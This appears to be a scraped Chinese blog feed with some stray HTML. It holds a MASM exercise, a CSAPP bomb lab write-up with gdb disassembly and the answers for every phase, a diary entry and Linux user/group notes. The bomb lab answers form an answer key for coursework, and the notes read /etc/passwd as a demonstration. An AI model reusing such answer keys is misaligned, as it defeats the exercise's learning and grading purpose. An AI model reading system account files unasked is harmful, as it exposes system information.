59
60
61
62
63
64
65
66
67
assume cs:code,ds:data,ss:stack  

data segment  
    db 'welcome to masm!',0  
data ends  

stack segment  
    dw 8 dup (0)  
stack ends  

code segment  
start:  mov dh,8  
    mov dl,3      ;第八行,第三列  

    mov cl,2      ;颜色  

    mov ax,data  
    mov ds,ax     ;ds指向数据段  

    mov si,0  
    call show_str  

    mov ax,4c00h  
    int 21h  

show_str:  
    push dx  
    push cx  
    push ax  
    push ss  
    push si    ;子程序开始所有寄存器入栈  

    mov ax,0B800h  
    mov es,ax    ;es指向显示的起始地址  

;计算行偏移量  
    mov al,0a0h ;160个字节一行  
    dec dh      ;行号减一,00 - dh-1  共dh行  
    mul dh      ;相乘  结果放在ax里  
    mov bx,ax   ;偏移量  

    mov al,2   ;一列两个字符  
    dec dl      ;列号减一,00 -dl-1 共dl列  
    mul al  
    add bx,ax  ;偏移地址计算完成  

    mov di,0     ;di字符读取时候每次的偏移 每次加1  
    mov si,0  

    mov al,cl   ;颜色暂时保存在al里 cx需要用到  
s1:   
    mov ch,0    ;置0  
    mov cl,ds:[di]  ;字符放在cl里  
    jcxz ok  
    mov ch,al     
    mov es:[bx+si],cx   ;字符颜色一起放入显示位置  

    add si,2  
    inc di  
jmp short s1  
ok:   
    pop si    ;子程序开始所有寄存器入栈  
    pop ss  
    pop ax  
    pop cx  
    pop dx  
    ret
]]> <h1 id="扯话"><a href="#扯话" class="headerlink" title="扯话"></a>扯话</h1><p>开始啃汇编啦,看过CSAPP第三章后,感觉上手还是比较友好的</p> <p>准备顺序大概是</p> <p>王爽汇编语言 -&gt; x8 CSAPP bomblab(伪)报告 https://jackwener.github.io/2018/05/11/bombLab/ 2018-05-10T17:00:00.000Z 2018-05-11T07:56:19.972Z 上个月就开始搞CSAPP了,之前书没看好,LAB做起来也磕磕绊绊.把书的第三章重新看了遍后,再来做.

另外,大概也要定个计划把汇编学了

之前GDB一直不太会用,通过这个机会也是学习了下,后面希望提升自己的学习力,什么不会遇上了能快速的学习.

注意不要让bomb爆炸,虽然我们不会被扣分…..我一开始都是直接炸来炸去的…..

每做完一个部分,就可以将答案保持在solution.txt中,避免重复输入,使用set args ./solution.txt来设置答案

phase_1

1
2
3
4
5
6
7
8
9
10
11
(gdb) disassemble phase_1
Dump of assembler code for function phase_1:
   0x0000000000400ee0 <+0>:sub    $0x8,%rsp
   0x0000000000400ee4 <+4>:mov    $0x402400,%esi
   0x0000000000400ee9 <+9>:callq  0x401338 <strings_not_equal>
   0x0000000000400eee <+14>:test   %eax,%eax
   0x0000000000400ef0 <+16>:je     0x400ef7 <phase_1+23>
   0x0000000000400ef2 <+18>:callq  0x40143a <explode_bomb>
   0x0000000000400ef7 <+23>:add    $0x8,%rsp
   0x0000000000400efb <+27>:retq   
End of assembler dump.

补个知识

  1. 常用寄存器有16个,分为x86通用寄存器以及r8-r15寄存器。
  2. 通用寄存器中,函数执行前后必须保持原始的寄存器有3个:是rbx、rbp、rsp。rx寄存器中,最后4个必须保持原值:r12、r13、r14、r15。
    保持原值的意义是为了让当前函数有可信任的寄存器,减小在函数调用过程中的保存&恢复操作。除了rbp、rsp用于特定用途外,其余5个寄存器可随意使用。
  3. 通用寄存器中,不必假设保存值可随意使用的寄存器有5个:是rax、rcx、rdx、rdi、rsi。其中rax用于第一个返回寄存器(当 然也可以用于其它用途),rdx用于第二个返回寄存器(在调用函数时也用于第三个参数寄存器)。rcx用于第四个参数。rdi用于第一个参数。rsi用于 第二个函数参数。
  4. r8、r9分配用于第5、第6个参数。

第一题还是不难的,注意到

1
2
0x0000000000400ee4 <+4>:mov    $0x402400,%esi
0x0000000000400ee9 <+9>:callq  0x401338 <strings_not_equal>

从0x402400读入一个数到%esi,然后作为第二个参数传入函数中

1
2
(gdb) x/s 0x402400
0x402400:"Border relations with Canada have never been better."

1
2
3
4
break phase_1
run
输入一个字符串
print (char*)$rdi   第一个参数

发现第一个参数就是我们输入的,和第二个$0x402400处的对比,然后return 0就不会炸

phase_2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
(gdb) disas phase_2
Dump of assembler code for function phase_2:
   0x0000000000400efc <+0>:push   %rbp
   0x0000000000400efd <+1>:push   %rbx
   0x0000000000400efe <+2>:sub    $0x28,%rsp
   0x0000000000400f02 <+6>:mov    %rsp,%rsi
   0x0000000000400f05 <+9>:callq  0x40145c <read_six_numbers>
   0x0000000000400f0a <+14>:cmpl   $0x1,(%rsp)   #比较第一个数 和 1
   0x0000000000400f0e <+18>:je     0x400f30 <phase_2+52>
   0x0000000000400f10 <+20>:callq  0x40143a   #炸炸炸 <explode_bomb>
   0x0000000000400f15 <+25>:jmp    0x400f30 <phase_2+52>
   0x0000000000400f17 <+27>:mov    -0x4(%rbx),%eax  保存rbx的值给%eax
   0x0000000000400f1a <+30>:add    %eax,%eax   #乘以2
   0x0000000000400f1c <+32>:cmp    %eax,(%rbx)   #第二个数和之前数的2倍比较
   0x0000000000400f1e <+34>:je     0x400f25 <phase_2+41>
   0x0000000000400f20 <+36>:callq  0x40143a <explode_bomb>
   0x0000000000400f25 <+41>:add    $0x4,%rbx
   0x0000000000400f29 <+45>:cmp    %rbp,%rbx   # 比较是否为最后一个值
   0x0000000000400f2c <+48>:jne    0x400f17 <phase_2+27>
   0x0000000000400f2e <+50>:jmp    0x400f3c <phase_2+64>
   0x0000000000400f30 <+52>:lea    0x4(%rsp),%rbx
   0x0000000000400f35 <+57>:lea    0x18(%rsp),%rbp
   0x0000000000400f3a <+62>:jmp    0x400f17 <phase_2+27>
   0x0000000000400f3c <+64>:add    $0x28,%rsp
   0x0000000000400f40 <+68>:pop    %rbx
   0x0000000000400f41 <+69>:pop    %rbp
   0x0000000000400f42 <+70>:retq   
End of assembler dump.

提醒还是有的,注意<read_six_numbers>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
(gdb) disas read_six_numbers
Dump of assembler code for function read_six_numbers:
   0x000000000040145c <+0>:sub    $0x18,%rsp
   0x0000000000401460 <+4>:mov    %rsi,%rdx
   0x0000000000401463 <+7>:lea    0x4(%rsi),%rcx
   0x0000000000401467 <+11>:lea    0x14(%rsi),%rax
   0x000000000040146b <+15>:mov    %rax,0x8(%rsp)
   0x0000000000401470 <+20>:lea    0x10(%rsi),%rax
   0x0000000000401474 <+24>:mov    %rax,(%rsp)
   0x0000000000401478 <+28>:lea    0xc(%rsi),%r9
   0x000000000040147c <+32>:lea    0x8(%rsi),%r8
   0x0000000000401480 <+36>:mov    $0x4025c3,%esi
   0x0000000000401485 <+41>:mov    $0x0,%eax
   0x000000000040148a <+46>:callq  0x400bf0 <__isoc99_sscanf@plt>
   0x000000000040148f <+51>:cmp    $0x5,%eax
   0x0000000000401492 <+54>:jg     0x401499 <read_six_numbers+61>
   0x0000000000401494 <+56>:callq  0x40143a <explode_bomb>
   0x0000000000401499 <+61>:add    $0x18,%rsp
   0x000000000040149d <+65>:retq   
End of assembler dump.

可以看出,这个函数是读了6个32位整数,首先有0x18 = 24 = 6 x 4,4x8位就是32位,另外下面的代码也有读入过程.

继续看phase_2

cmpl $0x1,(%rsp)`比较第一个数 和 1

直接写注释来的好.(⊙﹏⊙)

大概就是1乘以2 ,然后重复…

答案就是1 2 4 8 16 32

然后设置断点验证即可

phase_3

不肝了,今天1.30睡的,明天7.00起,要不然给自己耳光.对应刚刚才写了的随想,肝帝计划,计划容易一时,难在坚持,加油,明早继续更

2.00睡不着,起来更

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
(gdb) disas phase_3
Dump of assembler code for function phase_3:
   0x0000000000400f43 <+0>:sub    $0x18,%rsp
   0x0000000000400f47 <+4>:lea    0xc(%rsp),%rcx
   0x0000000000400f4c <+9>:lea    0x8(%rsp),%rdx
   0x0000000000400f51 <+14>:mov    $0x4025cf,%esi
   0x0000000000400f56 <+19>:mov    $0x0,%eax
   0x0000000000400f5b <+24>:callq  0x400bf0 <__isoc99_sscanf@plt>
   0x0000000000400f60 <+29>:cmp    $0x1,%eax
   0x0000000000400f63 <+32>:jg     0x400f6a <phase_3+39>
   0x0000000000400f65 <+34>:callq  0x40143a <explode_bomb>
   0x0000000000400f6a <+39>:cmpl   $0x7,0x8(%rsp)
   0x0000000000400f6f <+44>:ja     0x400fad <phase_3+106>
   0x0000000000400f71 <+46>:mov    0x8(%rsp),%eax
   0x0000000000400f75 <+50>:jmpq   *0x402470(,%rax,8)
   0x0000000000400f7c <+57>:mov    $0xcf,%eax
   0x0000000000400f81 <+62>:jmp    0x400fbe <phase_3+123>
   0x0000000000400f83 <+64>:mov    $0x2c3,%eax
   0x0000000000400f88 <+69>:jmp    0x400fbe <phase_3+123>
   0x0000000000400f8a <+71>:mov    $0x100,%eax
   0x0000000000400f8f <+76>:jmp    0x400fbe <phase_3+123>
   0x0000000000400f91 <+78>:mov    $0x185,%eax
   0x0000000000400f96 <+83>:jmp    0x400fbe <phase_3+123>
   0x0000000000400f98 <+85>:mov    $0xce,%eax
   0x0000000000400f9d <+90>:jmp    0x400fbe <phase_3+123>
   0x0000000000400f9f <+92>:mov    $0x2aa,%eax
   0x0000000000400fa4 <+97>:jmp    0x400fbe <phase_3+123>
   0x0000000000400fa6 <+99>:mov    $0x147,%eax
   0x0000000000400fab <+104>:jmp    0x400fbe <phase_3+123>
   0x0000000000400fad <+106>:callq  0x40143a <explode_bomb>
   0x0000000000400fb2 <+111>:mov    $0x0,%eax
   0x0000000000400fb7 <+116>:jmp    0x400fbe <phase_3+123>
   0x0000000000400fb9 <+118>:mov    $0x137,%eax
   0x0000000000400fbe <+123>:cmp    0xc(%rsp),%eax
   0x0000000000400fc2 <+127>:je     0x400fc9 <phase_3+134>
   0x0000000000400fc4 <+129>:callq  0x40143a <explode_bomb>
   0x0000000000400fc9 <+134>:add    $0x18,%rsp
   0x0000000000400fcd <+138>:retq   
End of assembler dump.

注意到jmpq *0x402470(,%rax,8)我们可以发现程序使用了跳转表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
(gdb) x/1xg 0x402470
0x402470:0x0000000000400f7c
(gdb) x/1xg 0x402478
0x402478:0x0000000000400fb9
(gdb) x/1xg 0x402480
0x402480:0x0000000000400f83
(gdb) x/1xg 0x402488
0x402488:0x0000000000400f8a
(gdb) x/1xg 0x402490
0x402490:0x0000000000400f91
(gdb) x/1xg 0x402498
0x402498:0x0000000000400f98
(gdb) x/1xg 0x4024a0
0x4024a0:0x0000000000400f9f
(gdb) x/1xg 0x4024a8
0x4024a8:0x0000000000400fa6

1
2
3
4
5
6
7
8
9
%rax(输入参数1)       跳转地址            0xc(%rsp)(输入参数2)
0               0x0000000000400f7c       0xcf  207
1               0x0000000000400fb9       0x137 311
2               0x0000000000400f83       0x2c3 707
3               0x0000000000400f8a       0x100 256
4               0x0000000000400f91       0x185 389
5               0x0000000000400f98       0xce  206
6               0x0000000000400f9f       0x2aa 682
7               0x0000000000400fa6       0x147 327

ok啦

phase_4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
(gdb) disas phase_4
Dump of assembler code for function phase_4:
   0x000000000040100c <+0>:sub    $0x18,%rsp
   0x0000000000401010 <+4>:lea    0xc(%rsp),%rcx
   0x0000000000401015 <+9>:lea    0x8(%rsp),%rdx
   0x000000000040101a <+14>:mov    $0x4025cf,%esi
   0x000000000040101f <+19>:mov    $0x0,%eax
   0x0000000000401024 <+24>:callq  0x400bf0 <__isoc99_sscanf@plt>
   0x0000000000401029 <+29>:cmp    $0x2,%eax
   0x000000000040102c <+32>:jne    0x401035 <phase_4+41>
   0x000000000040102e <+34>:cmpl   $0xe,0x8(%rsp)
   0x0000000000401033 <+39>:jbe    0x40103a <phase_4+46>
   0x0000000000401035 <+41>:callq  0x40143a <explode_bomb>
   0x000000000040103a <+46>:mov    $0xe,%edx
   0x000000000040103f <+51>:mov    $0x0,%esi
   0x0000000000401044 <+56>:mov    0x8(%rsp),%edi
   0x0000000000401048 <+60>:callq  0x400fce <func4>
   0x000000000040104d <+65>:test   %eax,%eax
   0x000000000040104f <+67>:jne    0x401058 <phase_4+76>
   0x0000000000401051 <+69>:cmpl   $0x0,0xc(%rsp)
   0x0000000000401056 <+74>:je     0x40105d <phase_4+81>
   0x0000000000401058 <+76>:callq  0x40143a <explode_bomb>
   0x000000000040105d <+81>:add    $0x18,%rsp
   0x0000000000401061 <+85>:retq

注意到jne 0x401058 <phase_4+76>,发现这个函数jump到了自己,应该是个递归函数
disas func4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
(gdb) disas func4
Dump of assembler code for function func4:
   0x0000000000400fce <+0>:sub    $0x8,%rsp
   0x0000000000400fd2 <+4>:mov    %edx,%eax
   0x0000000000400fd4 <+6>:sub    %esi,%eax
   0x0000000000400fd6 <+8>:mov    %eax,%ecx
   0x0000000000400fd8 <+10>:shr    $0x1f,%ecx
   0x0000000000400fdb <+13>:add    %ecx,%eax
   0x0000000000400fdd <+15>:sar    %eax
   0x0000000000400fdf <+17>:lea    (%rax,%rsi,1),%ecx
   0x0000000000400fe2 <+20>:cmp    %edi,%ecx
   0x0000000000400fe4 <+22>:jle    0x400ff2 <func4+36>
   0x0000000000400fe6 <+24>:lea    -0x1(%rcx),%edx
   0x0000000000400fe9 <+27>:callq  0x400fce <func4>
   0x0000000000400fee <+32>:add    %eax,%eax
   0x0000000000400ff0 <+34>:jmp    0x401007 <func4+57>
   0x0000000000400ff2 <+36>:mov    $0x0,%eax
   0x0000000000400ff7 <+41>:cmp    %edi,%ecx
   0x0000000000400ff9 <+43>:jge    0x401007 <func4+57>
   0x0000000000400ffb <+45>:lea    0x1(%rcx),%esi
   0x0000000000400ffe <+48>:callq  0x400fce <func4>
   0x0000000000401003 <+53>:lea    0x1(%rax,%rax,1),%eax
   0x0000000000401007 <+57>:add    $0x8,%rsp
   0x000000000040100b <+61>:retq   
End of assembler dump.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
int func4(int a, int b, int c)
{
    int result;
    result = c;
    result = result - b;
    int tmp = result;
    tmp = (unsigned)tmp >> 31;
    result = result + tmp;
    result = result / 2;
    tmp = result + b;
    if(tmp > a)
    {
        c = tmp - 1;
        result = func4(a, b, c);
        return (2 * result);
    }
    result = 0;
    if(tmp < a)
    {
        b = tmp + 1;
        result = func4(a, b, c);
        return (1 + 2 * result);
    }
    return result;
}

因此phase_4破译可能结果为:

0 0

1 0

3 0

7 0

phase_5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
(gdb) disas phase_5
Dump of assembler code for function phase_5:
   0x0000000000401062 <+0>:push   %rbx
   0x0000000000401063 <+1>:sub    $0x20,%rsp
   0x0000000000401067 <+5>:mov    %rdi,%rbx   %rdi保存输入的字符串指针
   0x000000000040106a <+8>:mov    %fs:0x28,%rax
   0x0000000000401073 <+17>:mov    %rax,0x18(%rsp)
   0x0000000000401078 <+22>:xor    %eax,%eax
   0x000000000040107a <+24>:callq  0x40131b <string_length>   计算输入字符串长度
   0x000000000040107f <+29>:cmp    $0x6,%eax   判断输入字符串长度是否等于6
   0x0000000000401082 <+32>:je     0x4010d2 <phase_5+112>
   0x0000000000401084 <+34>:callq  0x40143a <explode_bomb>
   0x0000000000401089 <+39>:jmp    0x4010d2 <phase_5+112>
   0x000000000040108b <+41>:movzbl (%rbx,%rax,1),%ecx  复制输入字符串的第%rax个字符到%ecx中
   0x000000000040108f <+45>:mov    %cl,(%rsp)
   0x0000000000401092 <+48>:mov    (%rsp),%rdx
   0x0000000000401096 <+52>:and    $0xf,%edx
   0x0000000000401099 <+55>:movzbl 0x4024b0(%rdx),%edx
   0x00000000004010a0 <+62>:mov    %dl,0x10(%rsp,%rax,1)
   0x00000000004010a4 <+66>:add    $0x1,%rax  偏移量+1
   0x00000000004010a8 <+70>:cmp    $0x6,%rax  判断%rax是否等于6,不等于6继续循环
   0x00000000004010ac <+74>:jne    0x40108b <phase_5+41>
   0x00000000004010ae <+76>:movb   $0x0,0x16(%rsp)
   0x00000000004010b3 <+81>:mov    $0x40245e,%esi
   0x00000000004010b8 <+86>:lea    0x10(%rsp),%rdi
   0x00000000004010bd <+91>:callq  0x401338 <strings_not_equal>     判断%esi和%rdi指向的字符串是否相等
   0x00000000004010c2 <+96>:test   %eax,%eax
   0x00000000004010c4 <+98>:je     0x4010d9 <phase_5+119>
   0x00000000004010c6 <+100>:callq  0x40143a <explode_bomb>
   0x00000000004010cb <+105>:nopl   0x0(%rax,%rax,1)
   0x00000000004010d0 <+110>:jmp    0x4010d9 <phase_5+119>
   0x00000000004010d2 <+112>:mov    $0x0,%eax
   0x00000000004010d7 <+117>:jmp    0x40108b <phase_5+41>
   0x00000000004010d9 <+119>:mov    0x18(%rsp),%rax
   0x00000000004010de <+124>:xor    %fs:0x28,%rax
   0x00000000004010e7 <+133>:je     0x4010ee <phase_5+140>
   0x00000000004010e9 <+135>:callq  0x400b30 <__stack_chk_fail@plt>
   0x00000000004010ee <+140>:add    $0x20,%rsp
   0x00000000004010f2 <+144>:pop    %rbx
   0x00000000004010f3 <+145>:retq   
End of assembler dump.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(gdb) disas string_length
Dump of assembler code for function string_length:
   0x000000000040131b <+0>:cmpb   $0x0,(%rdi)
   0x000000000040131e <+3>:je     0x401332 <string_length+23>
   0x0000000000401320 <+5>:mov    %rdi,%rdx
   0x0000000000401323 <+8>:add    $0x1,%rdx
   0x0000000000401327 <+12>:mov    %edx,%eax
   0x0000000000401329 <+14>:sub    %edi,%eax
   0x000000000040132b <+16>:cmpb   $0x0,(%rdx)
   0x000000000040132e <+19>:jne    0x401323 <string_length+8>
   0x0000000000401330 <+21>:repz retq## secret_phase
   0x0000000000401332 <+23>:mov    $0x0,%eax
   0x0000000000401337 <+28>:retq   
End of assembler dump.
(gdb)

这个可以说是phase_1的升版本了,注意到movzbl (%rbx,%rax,1),%ecx 复制输入字符串的第%rax个字符到%ecx中每次取该字符串的一个字符,然后比对,然后+1,并且由开始的代码可知.字符串是6字符

1
2
3
4
(gdb) x/s 0x4024b0
0x4024b0 <array.3449>:"maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?"
(gdb) x/s 0x40245e
0x40245e:"flyers"

phase_6

第6个好难啊 QAQ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
(gdb) disas phase_6
Dump of assembler code for function phase_6:
   0x00000000004010f4 <+0>: push   %r14                                将被调用者保存寄存器压入栈
   0x00000000004010f6 <+2>: push   %r13
   0x00000000004010f8 <+4>: push   %r12
   0x00000000004010fa <+6>: push   %rbp
   0x00000000004010fb <+7>: push   %rbx                                %rsp = 0x7fffffffe2c0
   0x00000000004010fc <+8>: sub    $0x50,%rsp                          分配栈空间 %rsp = 0x7fffffffe270
   0x0000000000401100 <+12>:    mov    %rsp,%r13

   0x0000000000401103 <+15>:    mov    %rsp,%rsi
   0x0000000000401106 <+18>:    callq  0x40145c <read_six_numbers>     读入6个值,保存至从 %rsi 开始的地址

   0x000000000040110b <+23>:    mov    %rsp,%r14
   0x000000000040110e <+26>:    mov    $0x0,%r12d                      %r12 置0,并且%r13 %r14 %rbp 均和 %rsp 指向相同地址 0x7fffffffe270

   0x0000000000401114 <+32>:    mov    %r13,%rbp
   0x0000000000401117 <+35>:    mov    0x0(%r13),%eax                  将第 %r13 指向的输入数复制到 %eax
   0x000000000040111b <+39>:    sub    $0x1,%eax                       将输入数减1
   0x000000000040111e <+42>:    cmp    $0x5,%eax                       判断输入数是否小于等于6,因为上一步中减1操作
   0x0000000000401121 <+45>:    jbe    0x401128 <phase_6+52>           若大于6,则调用 explode_bomb
   0x0000000000401123 <+47>:    callq  0x40143a <explode_bomb>
=========================================================================================================================================================
   0x0000000000401128 <+52>:    add    $0x1,%r12d                      将 %r12 加1
   0x000000000040112c <+56>:    cmp    $0x6,%r12d                      判断 %r12 是否等于6
   0x0000000000401130 <+60>:    je     0x401153 <phase_6+95>           若等于6,跳转,否则继续执行
   0x0000000000401132 <+62>:    mov    %r12d,%ebx                      将 %r12 复制到 %ebx

   0x0000000000401135 <+65>:    movslq %ebx,%rax                       将 %ebx 符号位扩展复制到 %rax
   0x0000000000401138 <+68>:    mov    (%rsp,%rax,4),%eax              将第 %ebx 输入数复制到 %eax
   0x000000000040113b <+71>:    cmp    %eax,0x0(%rbp)                  比较 %r13 指向的输入数和 第 %ebx 输入数 是否相等
   0x000000000040113e <+74>:    jne    0x401145 <phase_6+81>           如果相等,则调用 explode_bomb
   0x0000000000401140 <+76>:    callq  0x40143a <explode_bomb>
   0x0000000000401145 <+81>:    add    $0x1,%ebx                       将 %ebx 加1
   0x0000000000401148 <+84>:    cmp    $0x5,%ebx                       判断 %ebx 是否小于等于5
   0x000000000040114b <+87>:    jle    0x401135 <phase_6+65>           若小于等于,跳转,否则继续执行;该循环判断 %r13 指向的数据和其后输入数不相等

   0x000000000040114d <+89>:    add    $0x4,%r13                       将 %r13 指向下一个输入数,该循环判断所有的输入数全部不相等
   0x0000000000401151 <+93>:    jmp    0x401114 <phase_6+32>
=========================================================================================================================================================
   0x0000000000401153 <+95>:    lea    0x18(%rsp),%rsi                 将 %rsi 指向栈中跳过读入数据位置作为结束标记,并且 %r14 仍和 %rsp 指向同一个位置
   0x0000000000401158 <+100>:   mov    %r14,%rax                       将 %r14 复制到 %rax
   0x000000000040115b <+103>:   mov    $0x7,%ecx
   0x0000000000401160 <+108>:   mov    %ecx,%edx                       将立即数0x7复制到 %edx
   0x0000000000401162 <+110>:   sub    (%rax),%edx                     立即数7减去 %r14 指向的数据
   0x0000000000401164 <+112>:   mov    %edx,(%rax)                     将7减的结果存回 %r14 执行的内存单元
   0x0000000000401166 <+114>:   add    $0x4,%rax                       %rax 指向下一个输入数
   0x000000000040116a <+118>:   cmp    %rsi,%rax                       比较是否达到输入数组的末尾,
   0x000000000040116d <+121>:   jne    0x401160 <phase_6+108>          该循环使用立即数7减去每个输入数据
==========================================================================================================================================================
   0x000000000040116f <+123>:   mov    $0x0,%esi                       将 %rsi 置0
   0x0000000000401174 <+128>:   jmp    0x401197 <phase_6+163>

   0x0000000000401176 <+130>:   mov    0x8(%rdx),%rdx                  将 0x8(%rdx) 指向内存单元的内容复制到 %rdx, 指向链表下一个元素
   0x000000000040117a <+134>:   add    $0x1,%eax                       将 %eax 加1
   0x000000000040117d <+137>:   cmp    %ecx,%eax                       比较 %ecx 和 %eax 是否相等
   0x000000000040117f <+139>:   jne    0x401176 <phase_6+130>          不相等,继续遍历链表,最终 %rdx 指向链表的第 %ecx 个节点
   0x0000000000401181 <+141>:   jmp    0x401188 <phase_6+148>
   0x0000000000401183 <+143>:   mov    $0x6032d0,%edx                  重置链表首地址
   0x0000000000401188 <+148>:   mov    %rdx,0x20(%rsp,%rsi,2)
   0x000000000040118d <+153>:   add    $0x4,%rsi
   0x0000000000401191 <+157>:   cmp    $0x18,%rsi
   0x0000000000401195 <+161>:   je     0x4011ab <phase_6+183>

   0x0000000000401197 <+163>:   mov    (%rsp,%rsi,1),%ecx              将 (%rsp + %rsi) 指向的数据复制到 %ecx
   0x000000000040119a <+166>:   cmp    $0x1,%ecx                       比较 %ecx 是否小于等于1
   0x000000000040119d <+169>:   jle    0x401183 <phase_6+143>          若小于等于,跳转,否则继续执行, 等于1, %edx 直接指向链表首地址
   0x000000000040119f <+171>:   mov    $0x1,%eax                       将 %eax 置1
   0x00000000004011a4 <+176>:   mov    $0x6032d0,%edx                  将 %rdx 指向内存单元 0x6032d0
   0x00000000004011a9 <+181>:   jmp    0x401176 <phase_6+130>          跳转; 该循环根据输入数将链表中对应的第输入数个节点的地址复制到 0x20(%rsp) 开始的栈中
 ==========================================================================================================================================================
   0x00000000004011ab <+183>:   mov    0x20(%rsp),%rbx                 将0x20(%rsp)的链表节点地址复制到 %rbx
   0x00000000004011b0 <+188>:   lea    0x28(%rsp),%rax                 将 %rax 指向栈中下一个链表节点的地址
   0x00000000004011b5 <+193>:   lea    0x50(%rsp),%rsi                 将 %rsi 指向保存的链表节点地址的末尾
   0x00000000004011ba <+198>:   mov    %rbx,%rcx

   0x00000000004011bd <+201>:   mov    (%rax),%rdx
   0x00000000004011c0 <+204>:   mov    %rdx,0x8(%rcx)                  将栈中指向的后一个节点的地址复制到前一个节点的地址位置
   0x00000000004011c4 <+208>:   add    $0x8,%rax                       移动到下一个节点
   0x00000000004011c8 <+212>:   cmp    %rsi,%rax                       判断6个节点是否遍历完毕
   0x00000000004011cb <+215>:   je     0x4011d2 <phase_6+222>
   0x00000000004011cd <+217>:   mov    %rdx,%rcx
   0x00000000004011d0 <+220>:   jmp    0x4011bd <phase_6+201>
   0x00000000004011d2 <+222>:   movq   $0x0,0x8(%rdx)                  该循环按照7减去输入数据的索引重新调整链表
==========================================================================================================================================================
   0x00000000004011da <+230>:   mov    $0x5,%ebp
   0x00000000004011df <+235>:   mov    0x8(%rbx),%rax                  将 %rax 指向 %rbx 下一个链表节点
   0x00000000004011e3 <+239>:   mov    (%rax),%eax
   0x00000000004011e5 <+241>:   cmp    %eax,(%rbx)                     比较链表节点中第一个字段值的大小,如果前一个节点值大于后一个节点值,跳转
   0x00000000004011e7 <+243>:   jge    0x4011ee <phase_6+250>
   0x00000000004011e9 <+245>:   callq  0x40143a <explode_bomb>
   0x00000000004011ee <+250>:   mov    0x8(%rbx),%rbx                  将 %rbx 向后移动,指向栈中下一个链表节点的地址
   0x00000000004011f2 <+254>:   sub    $0x1,%ebp                       判断循环是否结束,该循环判断栈中重新调整后的链表节点是否按照降序排列
   0x00000000004011f5 <+257>:   jne    0x4011df <phase_6+235>
   0x00000000004011f7 <+259>:   add    $0x50,%rsp
   0x00000000004011fb <+263>:   pop    %rbx
   0x00000000004011fc <+264>:   pop    %rbp
   0x00000000004011fd <+265>:   pop    %r12
   0x00000000004011ff <+267>:   pop    %r13
   0x0000000000401201 <+269>:   pop    %r14
   0x0000000000401203 <+271>:   retq
End of assembler dump.

secret_phase

]]> <p>上个月就开始搞CSAPP了,之前书没看好,LAB做起来也磕磕绊绊.把书的第三章重新看了遍后,再来做.</p> <p>另外,大概也要定个计划把汇编学了</p> <p>之前GDB一直不太会用,通过这个机会也是学习了下,后面希望提升自己的学习力,什么不会遇上了能快速的学习.</p though1 https://jackwener.github.io/2018/05/10/though1/ 2018-05-10T12:20:07.000Z 2018-05-12T12:05:15.728Z 一日随想 老子TMD要肝爆

今天和伍juju聊了一些,有了很多感想,和他聊天的过程中一不小心聊到了他的作息,他说他日常睡4.5-5.5个小时,养生睡6-7个小时,虽然之前就知道他睡的很短,但还是
被这个情况震惊到了.

我想了很多,其实我很多时候只是不愿意下功夫,走些歪路,想什么所谓的高效,其实都是狗屁,TMD本身就是干能解决的事情想那么多?大家都是水平差不多的,还真能效率高很多很多?今天又继续开始看第二次CSAPP,发现第一次看的都是什么鬼,漏了多少东西?多少东西没懂?你再高效能抵得过认认真真一点一点的刷,看2遍认真思考吗?我发现我就是自己过得太安逸了,遇到困难抱怨,害怕而不去解决,没那种 TMD就是干 的精神.

很多事情确实需要效率,但是!!!很多事情也需要肝,我希望自己成为一个能忍受肝的人,愿意肝的人,愿意主动解决问题的人,学计算机知识让我确实收获了非常非常多,不仅仅是知识上的,让我看到了自己很多的缺陷,加油!伍大佬说的也很多,很多事情越早做越有价值,越能拿到更多资源,可以滚雪球,这是自己凭肝 肝出来的,现在肝的多,后面过得好,就和高考一个样,高中努力,上好大学,资源多,后面容易发展.晚肝不如早肝,另外为自己喜欢的东西肝,我觉得也是一个很开心的事,肝!!!!

后面写博客记录肝的过程!!!加油!!!

]]> <h3 id="一日随想-老子TMD要肝爆"><a href="#一日随想-老子TMD要肝爆" class="headerlink" title="一日随想 老子TMD要肝爆"></a>一日随想 老子TMD要肝爆</h3><p><strong>今天和伍juju聊了一些,有了很多感 linux/unix系统编程手册 8章习题 https://jackwener.github.io/2018/05/09/tlpi8章习题/ 2018-05-09T12:03:03.000Z 2018-05-11T04:35:32.911Z 第8章

笔记

肠胃病每周大概都有那么几次,今天又犯了,整个人身体都不太好,没啥精神,写点总结文字,当做看后复习.

后面tlpi这本书就不会继续更了,把它当成一本工具书,用的时候翻阅.

第8章主要是介绍了用户和组的一些基本知识,为后面更深入的知识做了铺垫,介绍了讲了用户和组,还有记录用户的密码文件/etc/passwd,shadow密码文件/etc/shadow还有组文件/etc/group。

每个用户都有唯一的用户名和相关的用户标识符(UID)。用户可以属于一个或多个组,每个组都有唯一的组名和相关的组标识符(GID)。

用户和组的用途为:1、可以确定各种系统资源的所有权;2、对赋予进程访问上述资源的权限加以控制。

密码文件/etc/passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
jakevin@jakevin-PC:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
